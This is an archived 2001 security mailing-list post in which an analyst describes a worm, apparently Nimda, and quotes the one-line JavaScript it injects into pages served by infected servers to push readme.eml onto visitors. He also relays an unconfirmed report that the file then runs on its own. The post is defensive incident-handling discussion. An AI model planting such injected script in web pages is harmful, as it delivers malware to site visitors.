Some more details on the worm

• Previous message: Jim Olsen: "Re: New "concept" virus/worm?"
• Next in thread: Gary Flynn: "Re: [unisog] Some more details on the worm"
• Reply: Gary Flynn: "Re: [unisog] Some more details on the worm"
• Reply: Steiner, Michael: "RE: Some more details on the worm"
• Reply: Jeffrey Altman: "Re: [unisog] Some more details on the worm"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

When pages are served up by an infected server, it looks as though
readme.eml is 'attached' to them.  The server attempts to get the client to
open them through the following bit of code (from the .dll file):

<script language="JavaScript">window.open("readme.eml", null,
"resizable=no,top=6000,left=6000")</script>

According to Slashdot, this causes the file to be automatically opened and
executed by the client.  I haven't been able to confirm or deny that (but if
someone can, please do).

Regards,
Matt


--
Matt Davis, MCP
Intermediate Client Server Business Support Analyst
COUNTRY(SM) Insurance & Financial Services
309-821-6288
mailto:matt.davisat_private

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com

• Next message: Florian Piekert: "Fwd: Massive CMD.EXE and ROOT.EXE scan"
• Previous message: Jim Olsen: "Re: New "concept" virus/worm?"
• Next in thread: Gary Flynn: "Re: [unisog] Some more details on the worm"
• Reply: Gary Flynn: "Re: [unisog] Some more details on the worm"
• Reply: Steiner, Michael: "RE: Some more details on the worm"
• Reply: Jeffrey Altman: "Re: [unisog] Some more details on the worm"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Tue Sep 18 2001 - 11:38:27 PDT